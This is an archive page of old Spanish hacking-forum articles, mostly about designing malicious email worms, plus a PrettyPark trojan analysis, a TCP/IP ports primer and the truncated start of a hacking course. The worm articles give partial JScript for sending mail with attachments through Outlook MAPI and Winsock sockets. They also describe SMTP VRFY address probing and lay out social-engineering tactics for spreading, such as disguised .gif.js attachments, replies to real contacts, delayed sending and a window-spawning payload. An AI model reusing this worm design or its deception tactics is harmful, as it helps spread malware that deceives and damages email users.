A.H.E. - HackIndex (es.comp.hackers) » hackindex

Psicología de los mensajes de correo maligno IIa

Lokutus — Tue, 20 Jan 2009 11:57:46 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Psicología de los mensajes de correo maligno IIa
Autor: Lokutus
Tema: Virus y gusanos

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

El siguiente documento es propiedad de HackIndex y de su autor, pudiendo ser distribuído de forma totalmente libre y sobre cualquier tipo de soporte siempre y cuando se respete el formato original, se cite a A.H.E. como fuente, se incluya un enlace actualizado al documento o a la web del grupo: http://www.hackindex.org ; y se incluya este disclaimer en su totalidad y sin modificación alguna.

Queda extrictamente prohibida su distribución con fines lucrativos, cuando se altere su contenido sin consentimiento o cuando se incumpla cualquier otra condicion citada anteriormente en el presente disclaimer.
#####################################

ADVERTENCIA: El presente artículo y todos los que continuarán en esta serie con el mismo título, (y todos los que preceden a este artículo) se envían únicamente con fines didácticos y educativos, no siendo mi intención animar a nadie a cometer delitos relacionados con la transmisión de mensajes de correo malignos (*) del tipo “iloveyou” o “timofónica”.

(*) Llamados por mi MCM.

———————————————————————-

Hola, no me he perdido en el espacio, voy a entrar al grano con lo que tengo, aunque os advierto que no tengo cosas acabadas, sino a medio acabar y con problemas, ya os comentaré. Habíamos quedado que en el primer mensaje de la segunda parte cubriríamos los siguientes puntos:

* Envío de un mail por MAPI usando JavaScript.
* Envío de un mensaje por SMTP usando JavaScript.
* Detección de que una cuenta de correo existe, usando SMTP.

Comenzamos con el envío de mails, usando MAPI:

////////////////////////////////////////////////////////////////////////
//
// Envío de mail usando MAPI desde JavaScript
//
///////////////////////////////////////////////////////////////////////

main()

function main()
{

// Inicializamos las variables
      var objOL;
      var objMapi;
      var objMail;
      var sTexto;

// Creamos los objetos
   objOL   = WScript.CreateObject(“Outlook.Application”);
   objMapi = objOL.GetNameSpace(“Mapi”);
   objMail = objOL.CreateItem(0);

objMail.Recipients.Add(“Lokutus@galactica.com“);
objMail.Subject = “Esto es el suject del correo”

sTexto = “Y esto es el cuerpo del mensaje.\n”;
sTexto = sTexto + “y a continuación viene el fichero adjunto.\n\n”;

   objMail.Body = sTexto;
   objMail.Attachments.Add(“C:\Fichero.txt”)
   objMail.Send;

} // main

Naturalmente, el fichero tiene que tener la extensión .js. He de advertir que no he podido comprobar si funciona, pues tengo problemas con la clase de automatización. (un OCX que se me habrá borrado, ), por lo que quien lo quiera usar tendrá que comprobarlo.

Como esto ya está muy visto, al menos en VBS, voy a intentar hacerlo usando un OCX de comunicaciones por sockets, esa OCX está, o debe estar, en:

C:\Windows\System\MSWINSCK.OCX

Si alguien tiene VC++ o Visual Basic es muy probable que la tenga, decidme los demas si lo teneis, pues ahora no sé si viene por defecto con windows.

Para comprobar que está se puede usar el siguiente fichero Chequeo.JS

…………………………………………………………….

var objSocket;

   objSocket = new ActiveXObject(“MSWinsock.Winsock”);
   if (objSocket == null)
   {
      WScript.Echo(“Error inicializando el control Active X”);
   }
      else
   {
      objSocket.AboutBox();
   }

…………………………………………………………….

También, y para que haga algo util, podeis meter en el else las siguientes líneas:

…………………………………………………………….

var sInfo;

   sInfo = “\nNombre Maquina: ” + objSocket.LocalHostName;
   sInfo = sInfo + “\n\nDirección IP: ” + objSocket.LocalIP + “\n”;
   WScript.Echo(sInfo);

……………………………………………………………

Son muchos los que preguntan, ¿Como puedo saber mi dirección IP?, pues ya lo tienen, un Java Script.

¿Y como he sacado eso de “MSWinsock.Winsock” necesario para inicializar el OCX?, ¿Y los nombres de los métodos exportados?

Usando la herramienta “Active X Control Test Container”, es la que viene con las herramientas de M$, aunque mi imagino que existirán otras herramientas mejores para esa tarea, ¿Alguien conoce alguna?.

Tambien he usado el Active X Control Test Container para hallar que métodos exporta la clase.

He llegado hasta aquí, este es el código que tengo actualmente, que no me funciona del todo bien, consigo conectarme y desconectarme a sitios, pero no consigo enviar ni recibir nada.

……………………………………………………………..

////////////////////////////////////////////////////////////////
// Los primeros pinitos con el OCX de sockets y Java Script //
////////////////////////////////////////////////////////////////

main()

function main()
{

var objSocket;
var sCadena;

   objSocket = new ActiveXObject(“MSWinsock.Winsock”);
   if (objSocket == null)
      WScript.Echo(“Error inicializando el control Active X”);
   } else {
      // 0 = TCP, 1 = UDP
      objSocket.Protocol   = 0;
      // Tiene que ser numérico
      objSocket.RemotePort = 80;
      // No vale dirección IP, da error
      objSocket.RemoteHost = “www.microsoft.com“;

      // Un chequeo innecesario
      sCadena = “\n Host: ” + objSocket.RemoteHost + “\n Puerto : ” + objSocket.RemotePort + “\n”;
      WScript.Echo(sCadena);

      // Me conecto
      objSocket.Connect();
      while (objSocket.State > 7)
      {
         sCadena = “Conectando : ” + objSocket.State;
         WScript.Echo(sCadena);
      } // while

// El estado de conectado es el 7, (ver tabla siguiente)

// Código guarro y comentado, de diferentes pruebas

//      if (objSocket.State == 7) {
//         sCadena = “Se supone que estoy conectado : ” + objSocket.State;
//         WScript.Echo(sCadena);
//      } else {
//         sCadena = “Algo ha fallado: ” + objSocket.State;
//         WScript.Echo(sCadena);
//      } // if
      sCadena = “”;

//      var iCont;
//      objSocket.SendData(“Hola\n”);
for (iCont = 0; iCont > 10; iCont ++) {
//         objSocket.SendData(“Hola\n”);
         objSocket.GetData(sCadena);
         WScript.Echo(“[" + sCadena + "] ” + objSocket.BytesReceived + ” ” +
objSocket.State);
      }

objSocket.Close()

} // if

} // main

En realidad el método GetData, tiene otros dos métodos adicionales, que son opcionales

GetData(data, tipo, maxlen)

Eso si, no son del tipo Variant, no se si mi problema es debido a eso, del segundo parámetro he encontrado las siguientes constantes que están definidas en Visual Basic, pero no se cual debe ser su valor

   Byte                    vbByte
   Entero                 vbInteger
   Largo                  vbLong
   Simple                 vbSingle
   Doble                  vbDouble
   Moneda               vbCurrency
   Fecha                  vbDate
   Booleano             vbBoolean
   SCODE               vbError
   Cadena               vbString
   Matriz de bytes    vbArray + vbByte

Y para la función, State, si que se los valores

0    Predeterminado. Cerrado
1    Abierto
2    Escuchando
3    Conexión pendiente
4    Resolviendo host
5    Host resuelto
6    Conectando
7    Conectado
8    El equipo está cerrando la conexión
9    Error

Más info, en el MSDN

Tengo tambien otro problema al conectar, no se conecta inmediatamente, si escribo algo como

objSocket.Connect();
objSocket.GetData(sCadena);

Salta un evento de error, tengo que parar el script antes del GetData, pero no se como hacerlo.

Se que existen eventos del tipo OnConnect(), aunque aun así tendria que apañarmelas para parar el hilo.

Por ultimo, y como simple comentario, el OCX se puede usar también para hacer servidores, pues tiene los métodos Listen, Accept y Bind.

Para resolver los problemas, he pensado que sería más cómodo usar HTML, tal y como me han comentado “Elete”, además con HTML si se manejar eventos. Los HTML compilados, ¿son los CHM?

¿Qué herramienta necesito para compilar HTML?

Os dejo una cuantas preguntas por si alguien quiere investigar un poco.
El tercer punto, sólamente es posible si está resuelto el segundo, consiste en interrogar al servidor de correo si un destinatario existe, truco que usan los spammer para saber si les estamos intentando engañar con mensajes devueltos falsos.

VRFY cuenta@servidor.com
2XX OK >– La cuenta existe

5XX >– La cuenta no existe.

El MTU pregunta al MTU de destino si hace falta.
Lokutus, asimilando la red.
Postdata: los últimos antivirus de red que se instalan en el servidor de correo, (p.e. McAfee en MCIS), eliminan de forma radical cualquier mensaje de correo que tenga un fichero VBS o JS añadido. No se si tambien los CHM, ¿?

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Psicología de los mensajes de correo maligno I

Lokutus — Fri, 15 Jun 2001 22:17:35 +0000

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

ADVERTENCIA: El presente artículo y todos los que continuarán en esta serie con el mismo título, se envían únicamente con fines didácticos y educativos, no siendo mi intención animar a nadie a cometer delitos relacionados con la transmisión de mensajes de correo malignos (*) del tipo”iloveyou” o “timofónica”.

(*) De ahora en adelante los llamo MCM para abreviar.
1 – INTRODUCCION

En este primer mensaje me centraré en el diseño “psicológico” de un posible MCM y una introducción a lo que serían las carácterísticas de diseño, en la segunda parte, se desarrollarían aquellas partes de codigo que considero interesantes, aunque eso sí, sin acabar nunca de desarrollar el MCM, de tal forma que el código enviado como ejemplo sólo pueda ser utilizado por personas con conocimientos suficientes para comenzarlo desde el principio y evite la transmisión de MCM por parte de “lamers” o gente que quiera usarlo de forma personalizada para realizar venganzas personales.

En la tercera parte, propondré posibles soluciones, algunas de ellas ya existen. El conocimiento es una de esas soluciones, la ignorancia es uno de los principales factores que intervienen en la propagación de MCM y virus en general.

De esta primera parte, considero muy util su divulgación, lectura e incluso debate, pues considero que es mejor adelantarse a lo que puede venir que ser pillado por sorpresa.
2 – LOS MCM HASTA AHORA

Hasta ahora los MCM tenían características similares a la siguiente.

- Utilizaban un engaño basado en la ocultación de extensiones de ficheros, por ejemplo:

Un fichero con el nombre “pepe.txt.exe” se vería como “pepe.txt”

- Algunos de esos MCM, (los ejecutables con extensión exe), usaban un icono como el que usa el editor de Windows para reforzar el engaño.

- Los más utilizados hasta ahora han sido los “.EXE” y los “.VBS” de tal forma que mucha gente evita como la peste esas extensiones y algunos desarrolladores, están empezando a usar otras extensiones. Como es el caso del LifeStages que utiliza una extensión .SHS

- Normalmente utilizan toda la ingeniería social que pueden, como es el caso del ILOVEYOU.

- Hasta ahora, se trataba de un único fichero, el que se enviaba.

- En algunos, tratan de evitar su desactivación, copiandose a muchos sitios diferentes, y alterar varias entradas del registro.

- En la mayoría de los casos, en el momento en el que llega a la cuenta de correo de un usuario experto, la existencia del MCM es descubierta en el entorno en el que se mueve ese usuario experto, y en algunas ocasiones, por las empresas desarrolladoras de antivirus.

- Excepto en algunos pocos casos, suelen utilizar el interfaz MAPI como mecanismo de envío de mensajes. Lo que hace que no pueda propagarse en aquellas máquinas de usuarios de otros lectores de correo.

- Normalmente, se envían a direcciones de la carpeta de direcciones, y de uno en uno.

3 – COMPORTAMIENTO DE LOS USUARIOS DE EMAIL.

Este apartado, está basado en cuanto a mi experiencia propia, viendo en muchas ocasiones qué tipo de correos se envían y reciben en los centros de trabajo donde disponen de correo electrónico, y de varias listas de correo informales y puede diferir con lo experimentado por otras personas.
- En general, la mayoría de los usuarios saben que no deben abrir cualquier cosa que se les envíe, sobre todo de desconocidos.

- Es corriente, que formen grupos de amistades, y se envíen chistes, fotos, (pornográficas o humorísticas o salvajes), ficheros mpeg o avi con anuncios graciosos.

- Antes he comentado que los MCM solían tener un único fichero adjunto, (que yo sepa), y sin embargo, en los mensajes de correo que se suelen enviar entre amiguetes, es normal que haya 4 ficheros jpeg. o tres ficheros de texto repletos de chistes. o un par de zips, e incluso uno o dos mpeg, (o uno sólo si es muy grande).

- A veces, suelen enviar en mensaje de correo, dentro de otro mensaje de correo, (no recuerdo las cabeceras de los mensajes salvados del OutLook), pero suelen aparecer como un icono.

- Sigue siendo corriente que se sigan enviando ficheros ejecutables EXE, la mayoría de estos ficheros suelen contener animaciones hechas con aplicaciones del tipo Macromedia. (Un ejemplo de lo que digo es la película completa en dibujos animados de la guerra de las galaxias que está en noticias.com).

- Los “emails lúdicos”, generalmente, suelen tener varios destinatarios, y no uno sólo, como suele ser el caso de los MCM.
4 .- CONSIDERACIONES DE INGENIERIA SOCIAL EN LA TRANSMISION DE UN MCM

Para que un MCM tenga éxito:

- Debe ser capaz de engañar al máximo posible al usuario que lo recibe, inspirandole la suficiente confianza para que pinche en el icono.

Por ese motivo, debe llegar de personas con las que normalmente se intercambia correo de tipo lúdico, no de trabajo. Por ejemplo, en el caso del “ILoveYou”, es difícil se engañado si llega de alguien con quien sólo tienes relaciones por correo de trabajo.

- Debe tratar de evitar en la medida de lo posible, el ser descubierto, y para ello, debe ser capaz de dar lo que se espera que dé.

Por ejemplo, en el MCM “timofónica” y en el “LifeStages”, el usuario espera que se abra el notepad con un mensaje de texto plano, y efectivamente es lo que hace.

- Algunos usuarios se dan cuenta enseguida de que han ejecutado un MCM cuando la bandeja de salida se les llena de mensajes. Quizás sería una buena táctica no ser tan agresivo a la hora de enviar mensajes, y enviar pocos y mejor encaminados.

- En lugar de usar la libreta de direcciones, podría mirar los mensajes que están en la carpeta de mensajes enviados.

- Podría incluso contestar a los mensajes que están en la bandeja de entrada.

- El MCM podría llegar acompañado de varios ficheros, y al reenviarse, hacerlo con esos ficheros.

- Combinaciones interesantes podrían ser:

Enviar dos ficheros de texto con chistes, y el tercero un vbs.txt que genera el tercer fichero de texto.
Enviar tres o cuatro jpeg, y entre medias un gif.vbs.

(en algunos clientes los jpeg se visualizan sin siquiera abrirlos, sería sospechoso que un jpeg se viese y otro no, por eso lo cambiaría a otra extensión, por ejemplo gif o incluso html.
Y ahora bien, la ingeniería social está en:

“Me llega un mensaje que es una contestación a otro que he enviado y con varias fotos, no hay alarma, a pinchar tranquilamente”
5 – CONSIDERACIONES DE DISEÑO.

Si fuese lo suficientemente perverso como para crear un MCM entero, lo haría de esta manera:

- Lenguaje de programación: JavaScript, tiene las mismas capacidades que el VBS, pues al estar soportado por WSH, dispone de las mismas capacidades que el VBS, (Acceso al registro de Windows, utilización de Active X, manejo de ficheros, etc).

- Búsqueda y uso de SMTP para envío de mensajes de correo electrónico, usando para ello el OCX de manejo de sockets. En el caso de que no funcione ninguno de los SMTP de la lista, (malditos spammers), o no se encuentre el OCX adecuado usará el ya conocido interfaz MAPI.

- El MCM tendrá la forma .gif.js, al ser ejecutado, generará un gif de pequeño tamaño.

- Investigación del formato en el que guardan los mensajes de NetScape y busqueda en la estructura de ficheros, para recuperar direcciones.

- retardo de 24 horas en el envio de mensajes.

- Envío de SMS, usando un camino alternativo al usado por el MCM “timofónica”, utilizando un CGI o accediendo a una web, (Sólo si se encuentra el OCX de TCP/IP).

- PAYLOAD: Llevar la cuenta de ejecuciones, cuando lleve 10, crear un fichero HTML en el disco duro y llamar al navegador por defecto para que lo abra, el HTML tiene un bucle sin fin que abre ventanas.
En el artículo siguiente sólo trataré los módulos:

Envío de un mail por MAPI usando JavaScript.
Envío de un mensaje por SMTP usando JavaScript.
Detección de que una cuenta de correo existe, usando SMTP, este último punto no es necesario,
pero lo veo interesante, incluso para ser utilizado como una utilidad separada.

Y quizás en otro mensaje aparte que no tiene nada que ver con este, y si nadie se me adelanta, , envío de SMS sin usar el servicio Mail2SMS de movistar.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Apreti pass

Lokutus — Fri, 15 Jun 2001 22:16:29 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Apreti pass
Autor: Lokutus
Tema: Virus y gusanos

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Hola, me han enviado por email uno de esos troyanos que pululan por la red, en este caso el Pretty Park, aunque la versión antigua, y como siempre que me envían un virus o un troyano me pongo la mar de contento, ya tengo una victima más para asimilar, )), he podido completar el script de detección y eliminación del Pretty Park que pongo en el grupo de binarios, junto con algunas cosas más.

El proceso de asimilación, lo he realizado en un ordenador aparte, un viejo 486, ejecutando intencionadamente el icono de “apreti pas” como yo lo llamo.

En la primera prueba con el script, al intentar introducir en el registro HKLM\SOFTWARE\Classes\exefile\shell\open\command el valor “”%1 “%*” me confundí en el script y me cargué el registro, . Aunque el sistema seguía funcionando, no podía pararlo, y cuando ejecutaba un programa, no veía sus parámetros, por ejemplo, si hacía un “xcopy fichero1 fichero2″, no me lo copiaba.

Le pasé el RegClean.exe que está en http://www.microsoft.com y me quitó un montón de porquerías del registro, y eso que el sistema operativo estaba recien reinstalado, pero no me resolvió el problema.

Al final me dí cuenta que al escribir el valor “”%1 “%*”, lo puse al reves, y lo que tenía en el registro era “”%1 “*%”.

O sea, el %1 es el primer parámetro, el nombre del fichero y %* son todos los demás parámetros, si escribiese en el registro “”%1 “%2″, no habría posibilidad de pasar más de un parámetro a los programas, cogería el primero y los demás los descartaría. Simplemente no podía pasar parámetros a los programas por que Windows no sabía que hacer con “*%” que ignoraba. Probablemente, la parada del sistema se haga llamando a algún *.exe con un parámetro, y al no tener ese parámetro el ejecutable de parada no funcionaba.

Una vez funcionando el script limpiador, hice algunas pruebas más, por un lado lo he desensamblado para intentar extraer la rutina de ocultación en la tabla de procesos, no lo he conseguido todavía, cuando lo consiga veré si puedo meterla en el GranRAd como código inline, (nunca lo he hecho con Visual C++).

Por otro lado, tengo unos programitas interesantes que conseguí de http://www.sysinternals.com/

regmon95.zip Tracea todos los accesos al registro de windows.
openlist.zip Mantiene una lista de ficheros bloqueados.
filemon.zip Tracea todos los accesos a disco.

Al ejecutar Pretty Park, me quedé asombrado de la cantidad de consultas que hace, el fichero *.log que he guardado lo tengo en el grupo es.misc.binarios, pero resumiendo hace lo siguiente:

Extrae datos acerca de la versión de Windows. Extrae datos del panel de control. Intenta averiguar si tenemos puertos de comunicaciones, COM1, COM2, y de impresora, LPT1 Averigua que protocolos tenemos instalados, si tenemos una DLL de autodialing, Extrae varios parámetros de comunicaciones, si tenemos proxi instalado o si nos conectamos a un proxi. Averigua si estamos capacitados para hacer pings, ¡¡Otia!!, ¿el pretty park hace pings?

Cuando FILES32.vxd entra en ejecución, hace exactamente los mismos accesos y consultas que el fichero Pretty Park.exe, de echo son los dos del mismo tamaño, de echo son el mismo fichero, pero cambiado de nombre.

Ejecutando nuevamente Pretty Park.exe con el programa filemon.exe activado, observamos como hace accesos de lectura a PrettyPark.exe y de escritura a FILES32.VXD, o sea, un proceso de copia.

En el fichero filemonlog.LOG, los accesos de “???” son del sistema operativo. Y por último, puede hayar la causa de por qué Pretty park no mostró en mi máquina los sintomas de su ejecución, la activación del salvapantallas de tuberías.

568 23:37:26 Files32 Attributes C:\WINDOWS\SSPIPES.SCR NOTFOUND GetAttributes

Lokutus, asimilando la red.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

La novena puerta

NBK — Fri, 15 Jun 2001 22:15:07 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: La novena puerta
Autor: NBK
Tema: Protocología

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Introduccion: ————-

El siguiente articulo no pretende en modo alguno entrar en detalle en ningun protocolo o subtrocolo en concreto y debe ser considerado como una mera introduccion a ciertos conceptos basicos para la mejor comprension de las redes y la terminologia utilizada tan a menudo en los textos tecnicos.

Su cometido es puramente educativo y como tal intrinsicamente positivo en si mismo. ///////////////

TCP/IP y la filosofia Cliente/Servidor, puertos y protocolos.

————————————————————-

El TCP/IP (Transfer Control Protocol/Internetwork Protocol), es la base en la que se sustentan las comunicaciones en red modernas. Es un -Protocolo-, es decir una convencion, un lenguaje que hace posible el intercambio de paquetes de informacion a traves de la red entre diferentes ordenadores, definiendo una serie de reglas comunes a tal fin. Nos referimos a paquetes porque literalmente la informacion es dividida en bloques para optimizar la comunicacion.

Es un protocolo, pero existen numerosos -Subprotocolos- alrededor de el, muchos de los cuales usamos a diario aun sin ser conscientes de ello.

Cuando nos conectamos a la red, a traves de nuestro proveedor, necesitamos tener instalado en nuestra maquina un controlador TCP/IP, necesario para el intercambio de paquetes (informacion) en la Red. Pero para hacer uso de los subprotocolos necesitamos un programa -Cliente-, un cliente no es mas que lo que podriamos denominar un “interprete”, de alguna manera es como si el TCP/IP fuese el “idioma oficial” y los subprotocolos basados en el sus diferentes “dialectos”.

Uno de estos subprotocolos, y el mas interesante para nosotros sera el -Telnet-, practicamente todos los sistemas operativos incluyen un cliente Telnet, si usais Windows tan solo debereis abrir una sesion de MsDos y escribir “telnet”, a continuacion aparecera en pantalla la aplicacion cliente preparada para conectar con un -Servidor-, que no es mas que otro ordenador con una aplicacion servidora.

Para aprender mas sobre este y otros protocolos asociados os remito al articulo de Seldon titulado: Manual de referencia de FTP, Telnet, correo y news. Donde tambien se entro en el tema de puertos entre otras cosas.

Bien, algo tremendamente importante de entender es la necesidad de un programa para la utilizacion de cualquier protocolo, tanto en el lado Servido como en el Cliente. Si navegamos por la Red el protocolo usado sera el HTTP (Hyper Text Transfer Protocol), y es nuestro Browser (Navegador) el software que actua como interprete de este protocolo para nosotros. Cuando exploramos Internet nosotros disponemos de un navegador en nuestra maquina (este el programa cliente) mientras que, al otro lado, alla donde se encuentren las paginas que buscamos, existira un programa servidor. Cuando solicitamos una pagina web escribiendo su direccion en el navegador (por ejemplo http://www.hackindex.org ) este requerira una copia de la pagina a la aplicacion servidora que se encuentra en un ordenador remoto, utilizando el protocolo HTTP (es por esto que se pone al principio de cada direccion url). El software servidor recibe la peticion y te manda la pagina web a tu ordenador, donde tu cliente (navegador) hara las operaciones oportunas para mostrartela tal y como esta existe en el ordenador servidor. Recuerda siempre que la pagina web es recreada en -tu- maquina, esta es una de las claves de la filosofia Cliente/Servidor y la que hace posible que un solo ordenador servidor pueda ofrecer la misma pagina a multiples -clientes-.

Espero que en este punto, os haya ayudado a comprender mejor el modelo Cliente/Servidor y como ambos lados de la moneda utilizan un protocolo en concreto para entenderse.

Empezamos el baile de terminos:

La aplicacion que se encuentra en el ordenador servidor se denomina tambien -Servicio-, y no es dificil de entender ya que presta un “servicio” a nuestras aplicaciones clientes, en el caso anterior “sirve” paginas web a peticion nuestra. Pero este es solo un tipo de servicio disponible.

A estos servicios accederemos a traves de -Puertos-, que no son mas que numeros asignados a cada servicio y que sirven para discernir a que servicios van dirigidas nuestras peticiones. El concepto puerto es tan solo “logico”, es decir, conviene no olvidar que no existen en realidad fisicamente. Esto es a menudo objeto de confusion ya que existen puertos de comuniciones -fisicos- en nuestro ordenador, usualmente nuestro modem estara conectado a nuestro puerto fisico “COM-1″ o “COM-2″, pues bien, podriamos imaginarnos esta interface fisica como un gran portal al que llega un cartero con un saco lleno de cartas, algunas de estas cartas irian dirigidas al piso 21, otras al 23, etc, en cada piso viviria un servicio….o lo que es lo mismo un programa que ofreceria algun tipo de servicio basado en un protocolo especifico, cada vecino hablaria un lenguaje diferente…y si esa carta no esta escrita en el lenguaje apropiado nunca seria entendida por este.

Pero este tan solo seria un ejercicio de imaginacion para comprender mejor toda la historia ya que, como he dicho, el concepto puerto es completamente virtual.

Los puertos serian pues caminos virtuales por los que correria informacion (paquetes) en un determinado lenguaje (protocolo) entre un programa cliente y otro servidor. Y siempre, el cliente hara una peticion…..y el servidor ofrecera respuesta.

Usualmente, los servicios mas utilizados, como Telnet, FTP, HTTP…… tienen unos numeros de puerto asignados por defecto, esto es mas una convencion que otra cosa, es necesario estar abierto a sorpresas en lo referente a numeros. Por ejemplo el HTTP suele tener asignado el puerto numero 80, el Telnet el 23, etc…. En cambio es comun ver servidores web a traves del puerto 8080, o Telnet mas arriba del puerto 1024.

No es una contradiccion, pensar en ello como que alguien movio el programa al piso de arriba y solo es posible acceder a el tocando a esa nueva puerta. El hecho de que tradicionalmente se usen unos determinados numeros de puerto es tan solo para que la labor de busqueda de un servicio sea mas intuitiva, de manera que si buscas Telnet primero miraras si en el puerto 23 esta disponible dicho servicio.

Esto tiene conotaciones claras en lo que a seguridad de redes se refiere, los administradores sabedores de la utilizacion tradicional de estos puertos solemos ubicarlos en numeros diferentes, de manera que su localizacion no sea inmediata, y se requiera un -scaneo- en profundidad.

Scanear un ordenador no es mas que barrer sus puertos en busca de servicios activos, este puede ser -selectivo- en busca de puertos concretos o mas usuales, o -completo- un chequeo secuencial uno a uno de todos los puertos, los numeros validos de puerto van del 1 al 65535, y en principio cualquier servicio puede ser asignado a cualquier puerto aunque se recomiende cierta coherencia o se ansie segun nos vaya el baile.

Algo con lo que a menudo podremos encontrarnos es con -Traps-, esto son, trampas. Como si de queso en una ratonera se tratase es posible hacer parecer que, por ejemplo, el puerto 23 ofrece Telnet cuando en realidad tan solo se trata de una aplicacion colocada en dicho puerto para, en el mejor de los casos entorpecer la exploracion de dicho ordenador remoto. Es facil pensar en cosas que hacer con una persona que entro por la puerta equivocada, y obviamente, no es de la casa.

Un ejemplo claro de lo expuesto arriba lo teneis en los tan populares anti-bo, anti-netbus, anti-todo.

Los troyanos como el NetBus, como aplicaciones servidoras que son, ofrecen sus servicios por un determinado puerto, este puerto, sea cual sea el numero e independientemente del troyano que hablemos, hara muy probablemente uso de un puerto -Registrado-. Se denomina puerto registrado a los puertos altos, por encima del 1024, y hasta el 49151, que tradicionalmente se destinan a aplicaciones que no entran dentro de los servicios clasicos ofrecidos por los servidores, y que pueden ser utilizados por programas ejecutados por usuarios ordinarios.

Resumiendo, si estas infectado con el NetBus, este permanecera a la escucha por ejemplo por el puerto 1234. Sabedores de esto, y si disponemos de un cliente de NetBus, podriamos escanear diferentes ordenadores en busca de dicho servidor en ese puerto 1234, y simplificando una tanto podriamos conectarnos con el a traves de dicho puerto si conseguimos localizar alguna maquina infectada.

Estas aplicaciones Anti-Troyanos, suelen escuchar en los mismos puertos donde se supone que los troyanos operan por defecto pero en el momento que alguien intenta una comunicacion por ese puerto el programa contesta con algun mensaje airado o quizas algo peor.

Luego es algo parecido al concepto de “trampa” del que hablabamos.

Los puertos, al menos los -Well Known Ports-, o los puertos bien conocidos, estan documentados, es decir existe informacion sobre los servicios que habitualmente se ofrecen por ellos y sus protocolos asociados. Existen listas disponibles, y en general a partir del puerto 1024 deben ser consideradas como meramente orientativas. Los troyanos han cobrado tal notoriedad que a menudo sustituyen en estas listas a los servicios ofrecidos tradicionalmente en ciertos puertos, o incluso existen listas de troyanos y sus puertos asociados.

Me gustaria recordar brevemente algo sobre los puertos, para que en lo que en mi mano este paliar posibles sustos inecesarios o alarmas injustificadas.

Demasiado a menudo leo: “Han intentado atacarme con el BO por el puerto 31337″, “Intentaron entrarme por el puerto 5666″;…… Las mas de las veces estos pequeños sobresaltos son producidos por paquetes que llegan a nuestro ordenador buscando un servidor en un puerto, casi siempre producto de scaneos aleatorios, o de conexiones erroneas del cliente llamando al servidor. Por supuesto estoy hablando de comunicaciones -InBound-, es decir, paquetes entrantes.

Cada vez mas normalmente, la gente mas o menos informada instala software -Firewall- en sus maquinas para controlar el flujo de informacion saliente y entrante. Los firewall son algo asi como “corta fuegos” virtuales, tanto en su version fisica (ordenadores dedicados) como software (paquetes de seguridad como AtGuard, o Zone Alarm) actuan analizando los paquetes que se envian y reciben, determinando en base a su configuracion si deben ser permida o no su emision o recepcion.

Una persona que disponga de un cliente de cualquier troyano disponible intentara encontrar ordenadores infectados con su servidor, para ello lanzara paquetes al puerto en el que crea pueda estar este a la escucha. Esto provocara que el firewall nos avise de que “una comunicacion entrante ha sido detectada por el puerto xxxxx”, donde xxxxx puede ser cualquier cosa.

Esto no significa que estemos infectados por ningun troyano, tan solo podemos afirmar con “cierta” seguridad que alguien probo suerte. Y digo “cierta” seguridad, porque si alguien quisiera saber que servicios ofrece vuestro ordenador y efectuara un scaneo en completo de la maquina recibiriais por lo bajo 65000 paquetes en otros tantos puertos y esto no significaria mas que eso, un scaneo de fortuna.

Si no podemos suponer infeccion alguna por recibir un paquete en un puerto equivocado, menos aun podemos suponer que alguien intenta “colarnos” algo por debajo de la puerta.

Como hemos visto, un puerto en si mismo es pura virtualidad…nada sin un software detras, por lo tanto, un puerto abierto no supone riesgo siempre que no exista comunicacion a traves de el entre un programa cliente y otro servidor.

Otra actitud debemos adoptar si en cambio, los paquetes que detecta nuestro firewall fueran salientes, OutBound, ya que en ese caso una aplicacion que se encuentre -detras- del firewall, es decir en nuestra maquina o red, intenta el envio de un paqueta, ya sea iniciando una comunicacion o como contestacion a una peticion proveniente de algun lugar.

No obstante, si detectamos esto es gracias al firewall y, por tanto, dicho paquete puede ser obligado a no enviarse, de manera que incluso si estuvieramos infectados con algun tipo de software servidor no deseado no seria posible la comunicacion con un hipotetico cliente. Por lo que se impondria la calma y la posterior deteccion y desinfeccion (antivirus)….sin mayor alarma.

Otro tema delicado es la configuracion correcta de firewalls y demas software de seguridad mas o menos domestica, pero no es mi proposito ahora avanzar mas en ese sentido.

Lo fundamental, y si algo en claro debemos sacar de este escrito, es que en el campo del TCP/IP se juega un gran partido de futbol, en el cual juega el Cliente F.C. contra el Servidor Utd, y donde los jugadores (de todas las nacionalidades) pueden jugar casi en cualquier puesto,,,,aunque muchas veces….. ….adivinemos la alineacion.

“Ser justos, Ser malos.”

– N.B.K. www.hello.to/nbk —————————————–

Si este mundo no es serio, tratalo como se merece.

—————————————–

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Curso práctico de hacking (CPH) III

Lecter — Fri, 15 Jun 2001 22:14:50 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Curso práctico de hacking III
Autor: Lecter
Tema: Acceso a las cosas remotas

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

CURSO PRACTICO DE HACKING—3a entrega

Estimados estudiantes del CPH, en esta entrega nos centraremos ya en
las artima=F1as para la visitacion del objetivo que antes habiamos
escudrinyado (a partir de ahora usare la ny para denotar la enye
espanyola ya que puede verse mal en ciertos casos). Tengo ahora que
hacer un poco de “disclaiming” (lavarme las manos) acerca del uso que
pudiera darse a lo que os contare en este capitulo y el siguiente. La
visita que vamos a hacer no es con permiso del due=F1o y por lo tanto
se incurriria en un “allanamiento de morada informatica” si se emplea
por “el lado oscuro de la fuerza”=2E Esta claro que hemos de dominar
los sistemas y aprovechar sus fallos de seguridad para comprobar
nuestros conocimientos, pero podemos hacerlo de manera sana: o bien
autohacking o bien establecer un acuerdo con el administrador del
sistema que “hackeemos” para comprobar su seguridad. De cualquier
manera el conocimiento es una flor con la que la abeja hace la miel y
la ara=F1a su veneno.

Vamos a repasar algunas de las tecnicas mas adecuadas para el
principiante y luego vosotros mediante el estudio y la practica las
sobrepasareis e incluso ideareis algunas nuevas. Tened en cuenta que
